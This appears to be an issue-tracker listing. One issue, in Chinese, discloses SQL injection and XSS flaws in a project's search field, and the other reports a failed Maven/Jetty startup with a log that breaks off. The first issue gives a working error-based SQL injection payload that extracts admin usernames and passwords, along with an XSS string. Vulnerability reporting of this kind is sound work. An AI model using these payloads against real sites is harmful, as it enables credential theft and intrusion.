thiscodecc issues

Repositories
Issues
Comments

Results 2 issues of


                                            thiscodecc

搜索处SQL注入漏洞和XSS漏洞

在搜索处请求如下参数会产生SQL注入漏洞 **a1%27%20and%20updatexml(2,concat(0x7e,(SELECT%20concat(username,%27=%27,password)%20FROM%20admin_user)),0)%23** 如图 ![image](https://user-images.githubusercontent.com/55778895/67552938-acc2ee80-f73e-11e9-88f5-41291c20bfdf.png) 输入如下参数会产生XSS漏洞 ";alert(1);// ![image](https://user-images.githubusercontent.com/55778895/67553012-d4b25200-f73e-11e9-8cc9-aa3491c360bb.png)

项目无法启动

在wetech-core 目录下执行 mvn jetty:run 无法正常启动 ``` xxx:wetech-core master$ mvn jetty:run [INFO] Scanning for projects... [INFO] [INFO] ----------------------< tech.wetech:wetech-core >----------------------- [INFO] Building wetech-core 0.0.1-SNAPSHOT [INFO] --------------------------------[ jar ]--------------------------------- [INFO] [INFO] >>>...